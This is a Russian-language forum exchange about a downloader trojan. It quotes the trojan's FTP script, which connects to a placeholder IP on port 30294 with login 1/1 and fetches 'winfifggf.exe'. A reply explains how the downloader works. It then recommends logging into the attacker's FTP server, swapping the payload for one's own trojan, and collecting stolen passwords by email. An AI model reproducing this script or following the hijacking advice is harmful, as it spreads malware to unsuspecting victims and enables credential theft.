Сообщение от
De_X
open [Тут IP затем 30294]
user 1 1
get winfifggf.exe
quit
Что этот троян делает? и как можно обратить такой для свойх целей?
Мне вообще интересно, как может новичёк выдрать стоко инфы из троя, и при этом не знать, что это значит
Это троян-Downloader, те в него встроена лишь фунцция закачки чего-нить. Он лезет в интернет по указанному айпи на указанный порт(30294). Судя по синтаксису запроса, это ФТП-сервер. Трой авторизуется под именем юзера "1" и под паролем "1". Затем скачивает к тебе на комп основного тело трояна "winfifggf.exe".
Впринципе, он способен тут же его запустить ФТП-командой "!winfifggf.exe"(кажись, так)
Либо через реестр после перезагрузки.
Как это можно использовать?
Можно зайти на этот ФТП-сервак через какой-нить клиент (например, тотал-командер). Если очень повезёт, у тебя будут прова на запись.
Тогда делаешь своего троя и заменяешь родного на своего =] Гы..
И забираешь отчеты с паролями со своего мыла.